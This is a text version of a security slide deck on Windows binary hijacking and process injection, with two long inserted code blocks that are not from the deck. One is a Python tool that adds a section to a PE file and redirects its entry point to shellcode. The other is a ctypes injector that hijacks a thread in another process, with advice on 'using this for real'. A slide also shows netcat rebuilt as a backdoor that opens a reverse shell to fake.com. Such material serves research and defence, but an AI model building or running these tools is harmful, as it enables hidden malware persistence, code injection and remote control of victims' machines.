THE BLACK ART OF BINARY HIJACKING - PowerPoint PPT Presentation



SLIDE 1

THE BLACK ART OF BINARY HIJACKING

Nick Harbour, Principal Consultant
nick.harbour@mandiant.com

SLIDE 2

Agenda

Overview of Persistence Techniques
Binary Hijacking with binject
− Adding Sections
− Entry Point Redirection
− Import Poisoning
− TLS Callbacks
− Adding pre-made parasites
Process Injection Parasites
New Methods for Process Injection

SLIDE 3

Windows Persistence Techniques

Technique                     Install     Detect
Startup Folders               Very Easy   Very Easy
Registry Run Keys             Very Easy   Very Easy
Windows Services              Easy        Medium
Other Registry Hijacks        Medium      Medium
Binary Hijacking              Difficult   Difficult
DLL Search Order Hijacking*   Easy        Very Difficult

*For more info visit http://blog.mandiant.com/archives/1207

SLIDE 4

Introducing Binject

Very Simple Command Line Interface
Point-and-shoot Binary Hijacking
Add New Sections to a Binary
− Can Fully Rebuild PE binaries to make room
Redirect Entry Point to new Section
− Raw (no pointer on stack)
− Relative or Absolute pointer to OEP on the stack
− DLL Support

SLIDE 5

DLL Entry Point Redirection

    push 0FFFF3392h        ; Delta to OEP
    pop eax
    call $+5               ; Get EIP (pushed on the stack)
    add [esp], eax         ; Pointer to OEP left on stack
    ...
    Your Shellcode Here
    ...
    ret                    ; Back to OEP
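Added example, not binject's code and not from the deck: a pure-Python sketch of what slides 4 and 5 describe, appending a new section to a PE32 file, pointing AddressOfEntryPoint at it, and filling it with the push/pop/call/add stub so that a pointer to the original entry point (OEP) is left on the stack for the final ret. The delta the stub pushes is OEP minus (stub RVA + 11), because the return address pushed by call $+5 is the address of the add instruction, eleven bytes into the stub. The input is a constructed minimal i386 PE built inline (not a real binary); the code assumes a 32-bit PE, spare room in the header for one more section entry (the "full rebuild" binject offers for the no-room case is not implemented, the function raises instead), and shellcode that leaves ESP where it found it.

```python
"""Add a section to a PE32 and redirect its entry point through an OEP stub.
Constructed example; not binject's implementation."""
import struct

FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
SCN_CODE_RWX = 0x00000020 | 0x20000000 | 0x40000000 | 0x80000000  # CODE|EXECUTE|READ|WRITE
SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def align(v, a):
    return (v + a - 1) // a * a


def build_minimal_pe32(code=b"\xc3"):
    """Constructed sample input: a tiny i386 PE32 with one .text section at RVA 0x1000."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)   # i386, 1 section, PE32 opt hdr
    raw = align(len(code), FILE_ALIGN)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, raw, 0, 0, SECT_ALIGN, SECT_ALIGN, 0)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, SECT_ALIGN, FILE_ALIGN,
                       4, 0, 0, 0, 4, 0, 0, align(SECT_ALIGN + raw, SECT_ALIGN), FILE_ALIGN,
                       0, 3, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * 128                                                 # 16 empty data directories
    sect = struct.pack(SECTION_FMT, b".text", raw, SECT_ALIGN, raw, FILE_ALIGN, 0, 0, 0, 0, SCN_CODE_RWX)
    hdr = bytes(dos) + b"PE\0\0" + coff + opt + sect
    return hdr.ljust(FILE_ALIGN, b"\0") + code.ljust(raw, b"\0")


def parse_pe(data):
    """Header offsets and section table of a PE32 (enough for what we need)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("PE32 only in this example")
    table = opt + opt_size
    return {"coff": coff, "opt": opt, "sect_table": table, "nsec": nsec,
            "entry": struct.unpack_from("<I", data, opt + 0x10)[0],
            "sect_align": struct.unpack_from("<I", data, opt + 0x20)[0],
            "file_align": struct.unpack_from("<I", data, opt + 0x24)[0],
            "size_of_headers": struct.unpack_from("<I", data, opt + 0x3C)[0],
            "sections": [struct.unpack_from(SECTION_FMT, data, table + 40 * i) for i in range(nsec)]}


def oep_stub(stub_rva, oep_rva, payload):
    """push delta / pop eax / call $+5 / add [esp],eax / <payload> / ret.
    call $+5 pushes stub_rva+11 (the address of the add); adding delta makes it the OEP."""
    delta = oep_rva - (stub_rva + 11)
    return (b"\x68" + struct.pack("<i", delta)   # push imm32   ; delta to OEP
            + b"\x58"                            # pop eax
            + b"\xe8\x00\x00\x00\x00"            # call $+5     ; get EIP onto the stack
            + b"\x01\x04\x24"                    # add [esp],eax; pointer to OEP now on stack
            + payload                            # your shellcode here (must preserve ESP)
            + b"\xc3")                           # ret          ; back to OEP


def add_section_and_redirect(data, payload, name=b".binj"):
    """Append a section holding the stub and point the entry point at it."""
    pe = parse_pe(data)
    out = bytearray(data)
    hdr_off = pe["sect_table"] + 40 * pe["nsec"]
    if hdr_off + 40 > pe["size_of_headers"]:
        raise ValueError("no room for another section header; binject would rebuild the PE")
    last = pe["sections"][-1]                      # (name, vsize, va, rawsize, rawptr, ...)
    new_rva = align(last[2] + max(last[1], last[3]), pe["sect_align"])
    new_raw = align(len(out), pe["file_align"])
    body = oep_stub(new_rva, pe["entry"], payload)
    raw_size = align(len(body), pe["file_align"])
    struct.pack_into(SECTION_FMT, out, hdr_off, name.ljust(8, b"\0"), len(body), new_rva,
                     raw_size, new_raw, 0, 0, 0, 0, SCN_CODE_RWX)
    struct.pack_into("<H", out, pe["coff"] + 2, pe["nsec"] + 1)                 # NumberOfSections
    struct.pack_into("<I", out, pe["opt"] + 0x10, new_rva)                      # AddressOfEntryPoint
    struct.pack_into("<I", out, pe["opt"] + 0x38, align(new_rva + len(body), pe["sect_align"]))  # SizeOfImage
    return bytes(out.ljust(new_raw, b"\0") + body.ljust(raw_size, b"\0"))


def verify_redirect(data):
    """Follow the new entry point and compute the RVA the stub's ret will land on."""
    pe = parse_pe(data)
    sec = next(s for s in pe["sections"] if s[2] <= pe["entry"] < s[2] + max(s[1], s[3]))
    raw = sec[4] + (pe["entry"] - sec[2])
    delta = struct.unpack_from("<i", data, raw + 1)[0]
    return (pe["entry"] + 11 + delta) & 0xFFFFFFFF


if __name__ == "__main__":
    hijacked = add_section_and_redirect(build_minimal_pe32(), b"\x90\x90")
    print(hex(parse_pe(hijacked)["entry"]), hex(verify_redirect(hijacked)))
```

The check at the end is the one worth keeping around when doing this by hand: resolve the new entry point to a file offset, read the pushed delta back, and confirm that stub RVA + 11 + delta equals the OEP you started with, otherwise the ret sends the process into the weeds.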

SLIDE 6

Import Table Poisoning

Force a binary to load your DLL
Your DLL will load first
Useful for API Hooking, sandboxing

binject -i clean.exe -o hacked.exe -m evil.dll

SLIDE 7

Adding a TLS Callback

The Thread Local Storage (TLS) provides a mechanism to call a function on the following events:
− Process start
− Thread start
− DLL attach
− Thread terminate
− Process terminate
Will Execute BEFORE the entry point of the binary
Only used if USER32.DLL is loaded

binject -i clean.exe -o hacked.exe -d shellcode.bin --tls

SLIDE 8

Utility Wrapping

Add a fixed command line to a binary
− For example, hard code reverse shell switches into the netcat binary.

binject -i nc.exe -o backdoor.exe -c "fake.com 7777 -e cmd.exe"

Coming soon: Add a fixed standard input to a binary

SLIDE 9

Adding a Pre-Made Parasite

Shell-Code Payload
− Process Inject Shellcode into a Target Process
  • CreateRemoteThread() method
  • QueueUserAPC() method
  • Main Thread Hijack method (new)
Full EXE Payload
− Dropper
− In-Memory Process Replacement

SLIDE 10

Basic Process Injection Techniques

Memory must be allocated in remote process (VirtualAllocEx)
Data must be written to remote process (WriteProcessMemory)
Remote process must execute newly written code

SLIDE 11

Controlling Execution

CreateRemoteThread()
− Forces a new thread to be created at a location of your choosing
− Most traditional, well-known approach
− Always freakin' works
QueueUserAPC()
− Force the process to add an asynchronous procedure call (APC) of your choosing
− Process must use APC style of programming (hint: services.exe uses this)

SLIDE 12

Thread Hijacking – New Technique

Find a thread to hijack
Suspend the thread
Save the thread context with GetThreadContext()
Allocate space for your code and a stack
Write your code to the process
SetThreadContext() with EIP pointing to your code and ESP pointing to the new stack
ResumeThread()
Wait for the thread to suspend
SetThreadContext() back to the original
ResumeThread()

SLIDE 13

Notes on Thread Hijacking

Less memory forensic residue
− Thread is launched from valid executable range as opposed to remotely
Injected code needs to suspend its thread when finished
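Added example, not from the deck and not binject's code: the slide 12 sequence as a ctypes injector, including the VirtualAllocEx/WriteProcessMemory steps from slide 10 and the self-suspend tail that slide 13 says the injected code needs. It assumes a 32-bit Python on Windows driving a 32-bit target (x86 CONTEXT with EIP/ESP), that kernel32 is mapped at the same base in injector and target so SuspendThread's address can be resolved locally, and shellcode that preserves ESP. The "wait for the thread to suspend" step is done by probing with SuspendThread, whose return value is the previous suspend count: a non-zero result means the injected code has already parked the thread. The process and thread IDs are hypothetical; the context and stub helpers run anywhere, only hijack_thread needs Windows.

```python
"""Thread hijacking with GetThreadContext/SetThreadContext, x86 only.
Added example; assumes 32-bit Python and a 32-bit target process on Windows."""
import ctypes
import time
from ctypes import c_uint32, c_ubyte, c_void_p, c_size_t

CONTEXT_FULL = 0x10007             # CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS (x86)
PROCESS_ALL_ACCESS = 0x1F0FFF
THREAD_ALL_ACCESS = 0x1F03FF
MEM_COMMIT_RESERVE = 0x3000
PAGE_EXECUTE_READWRITE, PAGE_READWRITE = 0x40, 0x04
STACK_SIZE = 0x10000               # private stack for the injected code


class FLOATING_SAVE_AREA(ctypes.Structure):
    _fields_ = [("ControlWord", c_uint32), ("StatusWord", c_uint32), ("TagWord", c_uint32),
                ("ErrorOffset", c_uint32), ("ErrorSelector", c_uint32), ("DataOffset", c_uint32),
                ("DataSelector", c_uint32), ("RegisterArea", c_ubyte * 80), ("Cr0NpxState", c_uint32)]


class CONTEXT32(ctypes.Structure):
    """x86 CONTEXT as laid out in winnt.h."""
    _fields_ = ([("ContextFlags", c_uint32)]
                + [(n, c_uint32) for n in ("Dr0", "Dr1", "Dr2", "Dr3", "Dr6", "Dr7")]
                + [("FloatSave", FLOATING_SAVE_AREA)]
                + [(n, c_uint32) for n in ("SegGs", "SegFs", "SegEs", "SegDs",
                                           "Edi", "Esi", "Ebx", "Edx", "Ecx", "Eax",
                                           "Ebp", "Eip", "SegCs", "EFlags", "Esp", "SegSs")]
                + [("ExtendedRegisters", c_ubyte * 512)])


CONTEXT32_SIZE = ctypes.sizeof(CONTEXT32)   # 0x2CC, sizeof(CONTEXT) on x86; sanity check of the layout


def self_suspend_stub(suspend_thread_addr):
    """Tail the injected code must end with: SuspendThread(GetCurrentThread()).
    GetCurrentThread() is the constant pseudo-handle -2, so no call is needed for it."""
    return (b"\x6a\xfe"                                            # push -2   ; current thread
            + b"\xb8" + suspend_thread_addr.to_bytes(4, "little")  # mov eax, kernel32!SuspendThread
            + b"\xff\xd0"                                          # call eax  ; parks this thread
            + b"\xeb\xfe")                                         # jmp $     ; never reached, safety net


def hijacked_context(saved, code_addr, stack_base, stack_size):
    """Copy of the saved CONTEXT with EIP at our code and ESP inside our private stack."""
    ctx = CONTEXT32.from_buffer_copy(bytes(saved))
    ctx.Eip = code_addr
    ctx.Esp = (stack_base + stack_size - 16) & ~0xF               # keep 16-byte alignment
    return ctx


def hijack_thread(pid, tid, shellcode):
    """Run shellcode on an existing thread of pid, then put the thread back where it was."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.VirtualAllocEx.restype = c_void_p
    k32.VirtualAllocEx.argtypes = [c_void_p, c_void_p, c_size_t, c_uint32, c_uint32]
    k32.WriteProcessMemory.argtypes = [c_void_p, c_void_p, c_void_p, c_size_t, c_void_p]
    suspend_addr = ctypes.cast(k32.SuspendThread, c_void_p).value   # assumed same base in target
    hproc = k32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    hthr = k32.OpenThread(THREAD_ALL_ACCESS, False, tid)
    k32.SuspendThread(hthr)                                          # 2. suspend the thread
    saved = CONTEXT32(ContextFlags=CONTEXT_FULL)
    if not k32.GetThreadContext(hthr, ctypes.byref(saved)):          # 3. save its context
        raise ctypes.WinError(ctypes.get_last_error())
    code = shellcode + self_suspend_stub(suspend_addr)
    mem = k32.VirtualAllocEx(hproc, None, len(code), MEM_COMMIT_RESERVE, PAGE_EXECUTE_READWRITE)
    stack = k32.VirtualAllocEx(hproc, None, STACK_SIZE, MEM_COMMIT_RESERVE, PAGE_READWRITE)
    k32.WriteProcessMemory(hproc, mem, code, len(code), None)        # 4./5. code and stack
    k32.SetThreadContext(hthr, ctypes.byref(hijacked_context(saved, mem, stack, STACK_SIZE)))
    k32.ResumeThread(hthr)                                           # 6./7. run our code
    while k32.SuspendThread(hthr) == 0:                              # 8. wait for self-suspend:
        k32.ResumeThread(hthr)                                       #    still running, undo probe
        time.sleep(0.05)
    k32.SetThreadContext(hthr, ctypes.byref(saved))                  # 9. restore original context
    k32.ResumeThread(hthr)                                           # 10. undo our probe ...
    k32.ResumeThread(hthr)                                           #     ... and the stub's suspend
    k32.CloseHandle(hthr)
    k32.CloseHandle(hproc)
    return saved


if __name__ == "__main__":
    # Hypothetical target: pid 1234, thread 5678; shellcode is a single NOP here.
    print(hex(hijack_thread(1234, 5678, b"\x90").Eip))
```

Two things to keep in mind when using this for real: the hijacked thread may have been sitting inside a system call or holding a loader lock, so the shellcode should do as little as possible (ideally just launch its own thread and return to the self-suspend tail), and the forensic advantage from slide 13 only holds if the allocated code and stack regions are released or look unremarkable afterwards.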

SLIDE 14

Demo and Q&A

nick.harbour@mandiant.com
nickharbour@gmail.com
Twitter: @nickharbour
Website: www.rnicrosoft.net